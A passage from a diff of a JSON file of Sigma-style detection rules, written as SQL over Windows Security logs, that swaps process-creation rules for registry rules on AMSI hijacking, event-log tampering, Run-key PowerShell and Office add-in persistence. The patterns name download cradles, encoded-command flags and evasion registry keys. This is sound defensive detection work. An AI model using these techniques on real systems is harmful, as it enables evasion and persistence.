CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\') AND NewValue LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_script_execution.yml" + "filename": "registry_set_susp_service_installed.yml" }, { - "title": "Suspicious Sigverif Execution", - "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", "status": "experimental", - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sigverif.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_sigverif.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Potential PowerShell Downgrade Attack", - "id": "b3512211-c67e-4707-bedc-66efc7848863", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", "status": "test", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Harish Segar (rule)", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_downgrade_attack.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "status": "experimental", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((NewProcessName = '') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", - "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Suspicious Powershell In Registry Run Keys", + "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "status": "experimental", + "description": "Detects potential PowerShell commands or code within registry run keys", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Legitimate admin or third party scripts. Baseline according to your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh %' ESCAPE '\\' OR NewValue LIKE '%FromBase64String%' ESCAPE '\\' OR NewValue LIKE '%.DownloadFile(%' ESCAPE '\\' OR NewValue LIKE '%.DownloadString(%' ESCAPE '\\' OR NewValue LIKE '% -w hidden %' ESCAPE '\\' OR NewValue LIKE '% -w 1 %' ESCAPE '\\' OR NewValue LIKE '%-windowstyle hidden%' ESCAPE '\\' OR NewValue LIKE '%-window hidden%' ESCAPE '\\' OR NewValue LIKE '% -nop %' ESCAPE '\\' OR NewValue LIKE '% -encodedcommand %' ESCAPE '\\' OR NewValue LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Expression%' ESCAPE '\\' OR NewValue LIKE '%IEX (%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Command%' ESCAPE '\\' OR NewValue LIKE '%ICM -%' ESCAPE '\\' OR NewValue LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR NewValue LIKE '%IWR %' ESCAPE '\\' OR NewValue LIKE '% -noni %' ESCAPE '\\' OR NewValue LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_powershell_in_run_keys.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "New Root or CA or AuthRoot Certificate to Store", + "id": "d223b46b-5621-4037-88fe-fda32eead684", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_install_root_or_ca_certificat.yml" }, { - "title": "Suspicious New Instance Of An Office COM Object", - "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "status": "experimental", - "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of office automation via scripting" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_office_svchost_parent.yml" + "filename": "registry_set_enabling_turnoffcheck.yml" }, { - "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", - "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "title": "Disable Privacy Settings Experience in Registry", + "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "status": "experimental", - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "@gott_cyber", + "description": "Detects registry modifications that disable Privacy Settings Experience", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" + "filename": "registry_set_disable_privacy_settings_experience.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Register New IFiltre For Persistence", + "id": "b23818c7-e575-4d13-8012-332075ec0a2b", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], + "falsepositives": [ + "Legitimate registration of IFilters by the OS or software" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "registry_set_persistence_ifilter.yml" + }, + { + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Obfuscated IP Download", - "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "title": "Potential Persistence Via Visual Studio Tools for Office", + "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "status": "experimental", - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery" + "attack.t1137.006", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate Addin Installation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" + "filename": "registry_set_persistence_office_vsto.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", - "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "status": "experimental", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "JSC Convert Javascript To Executable", - "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "title": "Potential Persistence Via Custom Protocol Handler", + "id": 